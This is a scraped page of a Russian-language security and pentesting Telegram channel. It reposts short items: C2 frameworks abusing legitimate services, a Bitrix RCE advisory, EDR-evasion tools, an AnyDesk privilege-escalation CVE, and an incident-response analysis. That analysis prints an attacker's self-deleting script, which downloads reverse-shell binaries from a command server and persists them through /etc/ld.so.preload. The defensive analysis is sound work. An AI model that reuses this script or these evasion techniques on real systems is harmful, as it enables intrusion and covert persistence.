ar
Feedback
Fsecurity | HH

Fsecurity | HH

الذهاب إلى القناة على Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

إظهار المزيد
2 064
المشتركون
-224 ساعات
-97 أيام
+330 أيام
أرشيف المشاركات

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Living of the Land collection C2 ✔️ Что это: LOLC2 collection of C2 frameworks that leverage legitimate services to evade det
Living of the Land collection C2 ✔️ Что это:
LOLC2 collection of C2 frameworks that leverage legitimate services to evade detection
Среди которых есть С2:
Telegram, Asana, OneDrive, Microsoft Tasks, Jira, Notion👀 и другие.
Detect😜:
•пишем правила и фильтруем соединения господа •поведенческий анализ • Yara • мониторинг процессов и обращений к API
🔗https://lolc2.github.io/ 🦔@ThreatHuntingFather

Repost from GISCYBERTEAM
SubFinder SubFinder — это инструмент для поиска поддоменов, который использует пассивные методы сбора данных, не обращаясь на
SubFinder SubFinder — это инструмент для поиска поддоменов, который использует пассивные методы сбора данных, не обращаясь напрямую к целевому сайту. Он анализирует информацию из различных онлайн-источников, позволяя эффективно обнаруживать существующие поддомены. Репозиторий: https://github.com/projectdiscovery/subfinder Установка:
apt install subfinder
Примеры:
subfinder -h
subfinder -d example.com 
subfinder -d example.com -v
- Поддержка различных форматов вывода - Совместимость с Raspberry Pi - Пассивные источники данных - Поддержка STDIN/OUT для упрощения интеграции в рабочие процессы - Оптимизирован для скорости и экономии ресурсов

🔗Ссылка: https://opennet.ru/62691/

⛈ Критическая уязвимость в 1С-Битрикс которая использует уязвимость модулей интернет-магазинов Аспро В модулях, которая разра
⛈ Критическая уязвимость в 1С-Битрикс которая использует уязвимость модулей интернет-магазинов Аспро В модулях, которая разработала компания Аспро для 1С-Битрикс выявлена критическая уязвимость, которая может привести к сбоям в работе корзины покупок и административной панели 📡 Об уязвимости: Проблема связана с файлами в папке/ајах/, расположенной в корневой директории сайта: 🟢 reload_basket_fly.php; 🟢 show_basket_fly.php; 🟢 show_basket_popup.php Эти скрипты используют небезопасную функцию unserialize() в PHР, что позволяет злоумышленникам отправлять вредоносные POST-запросы. В результате возможен удалённый запуск команд (RCE), а также создание скриптами вредоносных файлов .htaccess, php.ini и с произвольными названиями вида 5af47f5502b6.php 📶 Защита 📶 Разбор ЧТНП | #веб

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

👉🏻

Repost from 1N73LL1G3NC3
ArgFuscator An open-source, stand-alone web application that helps generate obfuscated command lines for common system-native executables. Successful command-line obfuscation is likely to frustrate defensive measures such as AV and EDR software, in some cases completely bypassing detection altogether.

Repost from 1N73LL1G3NC3
Patchwerk Cobalt Strike BOF that finds all the Nt*system call stubs within NTDLL and overwrites the memory with clean stubs (
Patchwerk Cobalt Strike BOF that finds all the Nt*system call stubs within NTDLL and overwrites the memory with clean stubs (user land hook evasion). This way we can use the NTAPIs from our implant code, and if EDR check the call stack it will have originated from NTDLL. It’s pretty much the same as the original unhook by Raph Mudge, but this way there's no need to map ntdll.dll from disk or open handles to remote processes.
• Uses HellsGate & HalosGate to call direct syscalls for NtOpenProcess, NtWriteVirtualMemory, and NtProtectVirtualMemory. • Has custom GetModuleHandle & GetProcAddress(getSymbolAddress) written in C and ASM to evade hooks on kernel32. • If patching table of current process, does not use NtOpenProcess. Just uses hProc = (HANDLE)-1; instead.

Repost from APT
🖼 AnyDesk — Local Privilege Escalation (CVE-2024-12754) A vulnerability in AnyDesk allows low-privileged users to perform ar
🖼 AnyDesk — Local Privilege Escalation (CVE-2024-12754) A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator. 🔗 Source: https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754 #windows #anydesk #lpe #cve

Repost from ESCalator
(Ex)Cobalt в контейнере 🛂 В ходе реагирования на компьютерный инцидент команда PT ESC IR установила факт закрепления злоумыш
(Ex)Cobalt в контейнере 🛂 В ходе реагирования на компьютерный инцидент команда PT ESC IR установила факт закрепления злоумышленников в Docker-контейнерах. Анализируя дамп с узла, на котором установлен Docker, мы обнаружили образцы ВПО в директории /var/lib/docker/overlay2/[a-z0-9]+/diff/usr/bin/.+. Она содержит слои контейнеров:
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/processes — Reverse SSH
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/checks — ExСobalt Reverse SSH
Стало понятно, что мы обнаружили заражение внутри одного из контейнеров. Для дополнительного анализа мы получили Docker-образ, на основе которого создавался контейнер. Пример команды:
docker save myimage:latest | gzip > myimage_latest.tar.gz
Анализ истории показал, что атакующим удалось модифицировать образ путем выполнения двух команд: COPY, которая копировала файл update в образ, и команды запуска скрипта /bin/bash /update. Затем модифицированный образ был загружен в локальный Docker Registry.
{
   "created": "2023-08-11T01:13:12",
   "created_by": "/bin/sh -c #(nop) COPY file:[REDACTED] in / "
},
{
   "created": "2023-08-11T01:13:18",
   "created_by": "/bin/sh -c /bin/bash /update"
}
Далее в одном из слоев образа мы обнаружили самоудаляющийся sh-скрипт update:
#!/bin/bash
rm -- $0
apt update
apt install wget curl -y
apt-get clean autoclean
apt-get autoremove --yes
wget -q [REDACTED]:8000/bin/rev_sh_dns -O /usr/bin/checks
wget -q [REDACTED]:8000/bin/rev_ssh -O /usr/bin/processes
wget -q [REDACTED]:8000/lib/libssoc.so.3h -O /usr/lib/x86_64-linux-gnu/libssoc.so
chmod +x /usr/bin/checks /usr/bin/processes /usr/lib/x86_64-linux-gnu/libssoc.so
echo "/usr/lib/x86_64-linux-gnu/libssoc.so" >> /etc/ld.so.preload
Скрипт подгружал образцы ВПО с управляющего сервера в образ, а также для закрепления прописывал их в /etc/ld.so.preload. /usr/lib/x86_64-linux-gnu/libssoc.so — образец ExСobalt Launcher запускает процессы /usr/bin/checks и /usr/bin/processes. 🧐 Расследование показало, что атакующие модифицировали Docker-образ создаваемых контейнеров и таким образом не только закрепились в скомпрометированной инфраструктуре, но и получили контроль над вновь создаваемыми контейнерами. Чтобы предотвратить подобные компьютерные инциденты, рекомендуется проверять ОС, а также функционирующие на устройствах Docker-контейнеры и конфигурационные файлы / скрипты, участвующие в сборке. IoCs:
leo.rpm-bin.link
mirror.dpkg-source.info

e49b72e58253f4f58f9c745757eb3ab0
3bd5560b50c751c91056bfe654f9bc70
ef587305a462161682f74d0cad139caa
#ir #ioc #malware @ptescalator

👉🏻